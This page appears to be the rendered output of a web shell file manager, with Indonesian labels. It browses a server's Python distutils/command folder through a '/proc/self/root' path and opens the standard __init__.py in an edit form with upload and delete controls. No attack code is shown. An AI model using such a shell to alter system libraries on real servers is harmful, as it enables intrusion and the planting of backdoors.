PATH: //proc/self/root/proc/self/root/lib64/python3.9/distutils/command
FILE_BARU
CREATE
FOLDER_BARU
MKDIR
UPLOAD_FILE
GO
[ .. KEMBALI ]
📄 __init__.py
↓
X
📁 __pycache__/
X
📄 bdist.py
↓
X
📄 bdist_dumb.py
↓
X
📄 bdist_msi.py
↓
X
📄 bdist_rpm.py
↓
X
📄 bdist_wininst.py
↓
X
📄 build.py
↓
X
📄 build_clib.py
↓
X
📄 build_ext.py
↓
X
📄 build_py.py
↓
X
📄 build_scripts.py
↓
X
📄 check.py
↓
X
📄 clean.py
↓
X
📄 command_template
↓
X
📄 config.py
↓
X
📄 install.py
↓
X
📄 install_data.py
↓
X
📄 install_egg_info.py
↓
X
📄 install_headers.py
↓
X
📄 install_lib.py
↓
X
📄 install_scripts.py
↓
X
📄 register.py
↓
X
📄 sdist.py
↓
X
📄 upload.py
↓
X
SAVING...
BERHASIL DIUBAH!
EDITING: __init__.py
"""distutils.command Package containing implementation of all the standard Distutils commands.""" __all__ = ['build', 'build_py', 'build_ext', 'build_clib', 'build_scripts', 'clean', 'install', 'install_lib', 'install_headers', 'install_scripts', 'install_data', 'sdist', 'register', 'bdist', 'bdist_dumb', 'bdist_rpm', 'bdist_wininst', 'check', 'upload', # These two are reserved for future use: #'bdist_sdux', #'bdist_pkgtool', # Note: # bdist_packager is not included because it only provides # an abstract base class ]
SIMPAN PERUBAHAN